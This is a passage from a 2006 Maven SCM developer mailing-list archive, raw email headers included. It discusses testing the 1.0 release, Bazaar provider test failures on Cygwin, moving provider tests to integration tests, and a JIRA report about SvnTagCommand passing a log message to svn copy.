(qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 08:57:52 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webifymail01.webify.local) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 08:57:50 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: Tests of 1.0 Date: Sun, 5 Mar 2006 10:57:42 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Tests of 1.0 Thread-Index: AcZAEFhVPT8xWA1rQIy+a64KKGyy4wAZSnYQ From: "Mike Perham" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This was a big one for me when adding the Perforce provider. The "contract" for each method was undocumented and I had to look in other providers to see what they were doing and mock that behavior, assuming that behavior is correct... -----Original Message----- From: Brett Porter [mailto:[email protected]]=20 Sent: Saturday, March 04, 2006 10:49 PM To: [email protected] Subject: Re: Tests of 1.0 - there's some javadoc missing. Can this be added to the public facing classes? (eg, ScmFile, ScmResult, and the manager, provider and repository interfaces) From [email protected] Mon Mar 06 06:56:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92136 invoked from network); 6 Mar 2006 06:56:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 06:56:16 -0000 Received: (qmail 91881 invoked by uid 500); 6 Mar 2006 06:57:02 -0000 Delivered-To: [email protected] Received: (qmail 91858 invoked by uid 500); 6 Mar 2006 06:57:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 91846 invoked by uid 99); 6 Mar 2006 06:57:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 22:57:02 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 22:57:01 -0800 Received: by wproxy.gmail.com with SMTP id 70so1078887wra for <[email protected]>; Sun, 05 Mar 2006 22:56:41 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=BKLwstDjqVZ4winEKaMFvK4pR/t2JumqFcbmlwdGwCg2jveYrclb4/WKw8GI50v5J913ch+oAW1UzQoy6rsXPjTiu+/Z3OkpWLWNS8UR771VOx2bFgPXIR7FoALOlbM8FBxk68qeAvAIMN2ezxA1OrACay8Nz/W6Cgb68DZ5uFM= Received: by 161.129.204.104 with SMTP id p16mr693075wrd; Sun, 05 Mar 2006 22:56:40 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sun, 5 Mar 2006 22:56:40 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 6 Mar 2006 07:56:40 +0100 From: "Wim Deblauwe" <[email protected]> To: [email protected] Subject: Re: Question about Clearcase, Starteam and Perforce In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_5120_20760021.1141628200773" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_5120_20760021.1141628200773 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline You are right, ClearCase does not use that. 2006/3/3, Mike Perham <[email protected]>: > > And I believe ClearCase is the same. No idea about StarTeam. > > -----Original Message----- > From: Jeff Jensen [mailto:[email protected]] > Sent: Friday, March 03, 2006 8:20 AM > To: [email protected] > Subject: Re: Question about Clearcase, Starteam and Perforce > > Perforce does not use local disk for storage of info like CVS and svn. > > > Quoting Emmanuel Venisse <[email protected]>: > > > Hi, > > > > I added a new method in SCMProvider (String getScmSpecificFilename()) > > This method returns the name of reserved filename/directory use by scm > > > like CVS or .svn > > > > Do we have a similar file for Clearcase/Starteam/Perforce ? > > > > Emmanuel > > > > > > > > > ------=_Part_5120_20760021.1141628200773 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline You are right, ClearCase does not use that.<br><br><div><span class=3D"gmai= l_quote">2006/3/3, Mike Perham &lt;<a href=3D"mailto:Mike.Perham@webifysolu= tions.com">[email protected]</a>&gt;:</span><blockquote class= =3D"gmail_quote" style=3D"border-left: 1px solid rgb(204, 204, 204); margin= : 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> And I believe ClearCase is the same.&nbsp;&nbsp;No idea about StarTeam.<br>= <br>-----Original Message-----<br>From: Jeff Jensen [mailto:<a href=3D"mail= to:[email protected]">[email protected]</a>= ]<br>Sent: Friday, March 03, 2006 8:20 AM <br>To: <a href=3D"mailto:[email protected]">[email protected]= g</a><br>Subject: Re: Question about Clearcase, Starteam and Perforce<br><b= r>Perforce does not use local disk for storage of info like CVS and svn.<br= > <br><br>Quoting Emmanuel Venisse &lt;<a href=3D"mailto:[email protected]= ">[email protected]</a>&gt;:<br><br>&gt; Hi,<br>&gt;<br>&gt; I added a n= ew method in SCMProvider (String getScmSpecificFilename())<br>&gt; This met= hod returns the name of reserved filename/directory use by scm <br><br>&gt; like CVS or .svn<br>&gt;<br>&gt; Do we have a similar file for= Clearcase/Starteam/Perforce ?<br>&gt;<br>&gt; Emmanuel<br>&gt;<br>&gt;<br>= <br><br><br><br></blockquote></div><br> ------=_Part_5120_20760021.1141628200773-- From [email protected] Mon Mar 06 10:12:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91468 invoked from network); 6 Mar 2006 10:12:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 10:12:55 -0000 Received: (qmail 3789 invoked by uid 500); 6 Mar 2006 10:13:42 -0000 Delivered-To: [email protected] Received: (qmail 3768 invoked by uid 500); 6 Mar 2006 10:13:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 3757 invoked by uid 99); 6 Mar 2006 10:13:41 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 02:13:41 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 02:13:40 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:11:52 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:10:55 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:10:55 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:10:54 +0000 (GMT) Date: Mon, 06 Mar 2006 11:10:53 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: Tests of 1.0 In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > Currently, the Bazaar provider tests fail for me under Windows (I have > Bazaar installed in Cygwin). What version of bazaar do you use? (Version 0.7 is the current stable, pre 0.7 is failing on *nix like systems) > I'd actually like to have the tests not require svn, cvs, bzr installed > to pass, and move those tests to integration tests in some way. WDYT? I agree. But it's a dangerous decision. It will end up in broken baselines (providers) more often. We should encourage developers eg. myself to test with every provider. What about a configuration option? How is it done with the other VCSs? Torbjørn From [email protected] Mon Mar 06 10:38:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2069 invoked from network); 6 Mar 2006 10:38:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 10:38:31 -0000 Received: (qmail 28657 invoked by uid 500); 6 Mar 2006 10:39:18 -0000 Delivered-To: [email protected] Received: (qmail 28636 invoked by uid 500); 6 Mar 2006 10:39:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 28625 invoked by uid 99); 6 Mar 2006 10:39:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 02:39:17 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony5.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 02:39:16 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony5.iinet.net.au with ESMTP; 06 Mar 2006 18:38:51 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,167,1139155200"; d="scan'208"; a="668865111:sNHT4533236442" Message-ID: <[email protected]> Date: Mon, 06 Mar 2006 21:38:41 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: Tests of 1.0 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Torbjørn Smørgrav wrote: >> Currently, the Bazaar provider tests fail for me under Windows (I have >> Bazaar installed in Cygwin). > > What version of bazaar do you use? > (Version 0.7 is the current stable, pre 0.7 is failing on *nix like systems) $ bzr --version bzr (bazaar-ng) 0.7 Copyright 2005,06 Canonical Development Ltd. http://bazaar-ng.org/ > >> I'd actually like to have the tests not require svn, cvs, bzr installed >> to pass, and move those tests to integration tests in some way. WDYT? > > I agree. But it's a dangerous decision. It will end up in broken baselines > (providers) more often. > We should encourage developers eg. myself to test with every provider. > What about a configuration option? That's exactly what I meant - make it an integration test (perhaps in a profile) so that the builds only run unit tests (which should still do most of the testing, and just compare command lines rather than execute them). The integration tests can be run in an integration environment where the VCSs are installed (obviously, some will be limited to particular ones). This isn't required before 1.0, but the tests need to pass before 1.0. - Brett From [email protected] Mon Mar 06 10:41:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2896 invoked from network); 6 Mar 2006 10:41:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 10:41:01 -0000 Received: (qmail 30440 invoked by uid 500); 6 Mar 2006 10:41:47 -0000 Delivered-To: [email protected] Received: (qmail 30386 invoked by uid 500); 6 Mar 2006 10:41:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 30375 invoked by uid 99); 6 Mar 2006 10:41:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 02:41:47 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 02:41:46 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:38:57 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:38:55 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:38:54 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 06 Mar 2006 10:38:53 +0000 (GMT) Date: Mon, 06 Mar 2006 11:38:53 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: Tests of 1.0 In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > - since Bazaar, VSS, etc are "partially implemented", according to the > site, should they be omitted from this release? Or do they do enough to > be useful? Can we list what is implemented and what is not? We should at least define when a provider is implemented and not only partially implemented. Now supporting a system before version 1.0 (Bazaar is currently 0.7) is almost by definition partially. However I think its usefull and complete enough to be released. Torbjørn From [email protected] Mon Mar 06 14:22:27 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23776 invoked from network); 6 Mar 2006 14:22:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 14:22:07 -0000 Received: (qmail 90129 invoked by uid 500); 6 Mar 2006 14:22:48 -0000 Delivered-To: [email protected] Received: (qmail 90105 invoked by uid 500); 6 Mar 2006 14:22:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 90094 invoked by uid 99); 6 Mar 2006 14:22:48 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 06:22:47 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 06 Mar 2006 06:22:47 -0800 Received: (qmail 15785 invoked from network); 6 Mar 2006 14:22:30 -0000 Received: from 171.189.97-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 6 Mar 2006 14:22:30 -0000 Message-ID: <[email protected]> Date: Mon, 06 Mar 2006 15:22:16 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: Tests of 1.0 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I updated the matrix : http://docs.codehaus.org/display/SCM/SCM+Matrix Emmanuel Torbjørn Smørgrav a écrit : >>- since Bazaar, VSS, etc are "partially implemented", according to the >>site, should they be omitted from this release? Or do they do enough to >>be useful? Can we list what is implemented and what is not? > > > We should at least define when a provider is implemented and not only > partially implemented. > Now supporting a system before version 1.0 (Bazaar is currently 0.7) is > almost by definition > partially. However I think its usefull and complete enough to be released. > > Torbjørn > > > > From [email protected] Mon Mar 06 15:15:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61345 invoked from network); 6 Mar 2006 15:15:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 15:15:38 -0000 Received: (qmail 86294 invoked by uid 500); 6 Mar 2006 15:16:24 -0000 Delivered-To: [email protected] Received: (qmail 86273 invoked by uid 500); 6 Mar 2006 15:16:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 86258 invoked by uid 99); 6 Mar 2006 15:16:23 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 07:16:23 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 07:16:21 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 15:10:26 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Mon, 06 Mar 2006 15:10:25 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Mon, 06 Mar 2006 15:10:23 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 06 Mar 2006 15:10:17 +0000 (GMT) Date: Mon, 06 Mar 2006 16:10:16 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: Tests of 1.0 In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N It runs fine for me on linux, cygwin and WinXP. Can you give me the junit log? Regards Torbjørn -----Original Message----- From: Brett Porter [mailto:[email protected]] Sent: 6. mars 2006 11:39 To: [email protected] Subject: Re: Tests of 1.0 Torbjørn Smørgrav wrote: >> Currently, the Bazaar provider tests fail for me under Windows (I have >> Bazaar installed in Cygwin). > > What version of bazaar do you use? > (Version 0.7 is the current stable, pre 0.7 is failing on *nix like systems) $ bzr --version bzr (bazaar-ng) 0.7 Copyright 2005,06 Canonical Development Ltd. http://bazaar-ng.org/ > >> I'd actually like to have the tests not require svn, cvs, bzr installed >> to pass, and move those tests to integration tests in some way. WDYT? > > I agree. But it's a dangerous decision. It will end up in broken baselines > (providers) more often. > We should encourage developers eg. myself to test with every provider. > What about a configuration option? That's exactly what I meant - make it an integration test (perhaps in a profile) so that the builds only run unit tests (which should still do most of the testing, and just compare command lines rather than execute them). The integration tests can be run in an integration environment where the VCSs are installed (obviously, some will be limited to particular ones). This isn't required before 1.0, but the tests need to pass before 1.0. - Brett From [email protected] Mon Mar 06 15:19:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63445 invoked from network); 6 Mar 2006 15:19:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 15:19:18 -0000 Received: (qmail 96237 invoked by uid 500); 6 Mar 2006 15:20:04 -0000 Delivered-To: [email protected] Received: (qmail 96187 invoked by uid 500); 6 Mar 2006 15:20:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 96176 invoked by uid 99); 6 Mar 2006 15:20:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 07:20:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony2.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 07:20:01 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony2.iinet.net.au with ESMTP; 06 Mar 2006 23:19:39 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,168,1139155200"; d="scan'208"; a="380695627:sNHT25852238" Message-ID: <[email protected]> Date: Tue, 07 Mar 2006 02:19:31 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: Tests of 1.0 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Oh, got it sorted out. Had to install the real python and bzr, not the cygwin versions of such. See updated readme. - Brett Torbjørn Smørgrav wrote: > It runs fine for me on linux, cygwin and WinXP. > > Can you give me the junit log? > > Regards > Torbjørn > > -----Original Message----- > From: Brett Porter [mailto:[email protected]] > Sent: 6. mars 2006 11:39 > To: [email protected] > Subject: Re: Tests of 1.0 > > > Torbjørn Smørgrav wrote: >>> Currently, the Bazaar provider tests fail for me under Windows (I have >>> Bazaar installed in Cygwin). >> What version of bazaar do you use? >> (Version 0.7 is the current stable, pre 0.7 is failing on *nix like > systems) > > $ bzr --version > bzr (bazaar-ng) 0.7 > Copyright 2005,06 Canonical Development Ltd. > http://bazaar-ng.org/ > >>> I'd actually like to have the tests not require svn, cvs, bzr installed >>> to pass, and move those tests to integration tests in some way. WDYT? >> I agree. But it's a dangerous decision. It will end up in broken baselines >> (providers) more often. >> We should encourage developers eg. myself to test with every provider. >> What about a configuration option? > > That's exactly what I meant - make it an integration test (perhaps in a > profile) so that the builds only run unit tests (which should still do > most of the testing, and just compare command lines rather than execute > them). The integration tests can be run in an integration environment > where the VCSs are installed (obviously, some will be limited to > particular ones). > > This isn't required before 1.0, but the tests need to pass before 1.0. > > - Brett > From [email protected] Mon Mar 06 15:37:17 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73023 invoked from network); 6 Mar 2006 15:37:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 15:37:07 -0000 Received: (qmail 36757 invoked by uid 500); 6 Mar 2006 15:37:45 -0000 Delivered-To: [email protected] Received: (qmail 36706 invoked by uid 500); 6 Mar 2006 15:37:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 36695 invoked by uid 99); 6 Mar 2006 15:37:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 07:37:45 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Mar 2006 07:37:43 -0800 Received: (qmail 5718 invoked by uid 89); 6 Mar 2006 15:37:23 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 6 Mar 2006 15:37:23 -0000 Message-ID: <[email protected]> Date: Mon, 6 Mar 2006 09:37:23 -0600 (CST) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (SCM-170) SvnTagCommand doesn't work? MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-170?page=all ] Brett Porter updated SCM-170: ----------------------------- Priority: Critical (was: Major) Fix Version: 1.0 > SvnTagCommand doesn't work? > --------------------------- > > Key: SCM-170 > URL: http://jira.codehaus.org/browse/SCM-170 > Project: Maven SCM > Type: Bug > Reporter: Gareth Williams > Priority: Critical > Fix For: 1.0 > > > mvn release:prepare fails with the following output: > Provider message: > The svn tag command failed. > Command output: > svn: Local, non-commit operations do not take a log message > Have looked at source, and suspect SvnTagCommand needs to be fixed - in SVN the copy command does not accept a log message > Package: org.apache.maven.scm.provider.svn.svnexe.command.tag > Class: SvnTagCommand > private static Commandline createCommandLine( SvnScmProviderRepository repository, File workingDirectory, > String tag, File messageFile ) > { > cl.createArgument().setValue( "copy" ); > XXX cl.createArgument().setValue( "--file" ); > XXX cl.createArgument().setValue( messageFile.getAbsolutePath() ); > .... > } -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Mar 06 16:48:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18394 invoked from network); 6 Mar 2006 16:48:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 16:48:28 -0000 Received: (qmail 93355 invoked by uid 500); 6 Mar 2006 16:49:11 -0000 Delivered-To: [email protected] Received: (qmail 93332 invoked by uid 500); 6 Mar 2006 16:49:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list 